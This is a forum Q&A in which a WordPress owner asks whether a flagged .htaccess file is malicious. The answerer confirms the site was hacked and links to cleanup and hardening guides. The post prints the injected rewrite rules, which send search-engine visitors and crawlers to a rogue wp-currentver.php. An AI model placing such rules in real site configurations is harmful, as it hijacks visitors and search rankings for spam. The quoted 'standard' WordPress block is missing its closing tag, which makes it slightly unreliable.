Maggie Maggie - 1 year ago 105
PHP Question

Wordpress/Godaddy: How can I tell if this .htaccess has malware in it? wp-currentver.php

Godaddy flagged my /html/.htaccess file as possible malware.

Is this malicious?
Fwiw, it also flagged wp-currentver.php as possible malware.

My site looks fine, appears to be functioning fine.

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /wp-currentver.php?p=$1 [L]
# BEGIN WordPress

# END WordPress

Answer Source

You got hacked.

Those are redirects that detect if someone is coming through Google search results with Google as a referrer; the standard WordPress (non-Multisite) rewrite block is at i.e.:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

And the file wp-currentver.php is malicious and not WordPress core. Also see!topic/webmasters/f4Cw1k1-j6g

Carefully follow FAQ My site was hacked - WordPress Codex.

Find a more secure host.

Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download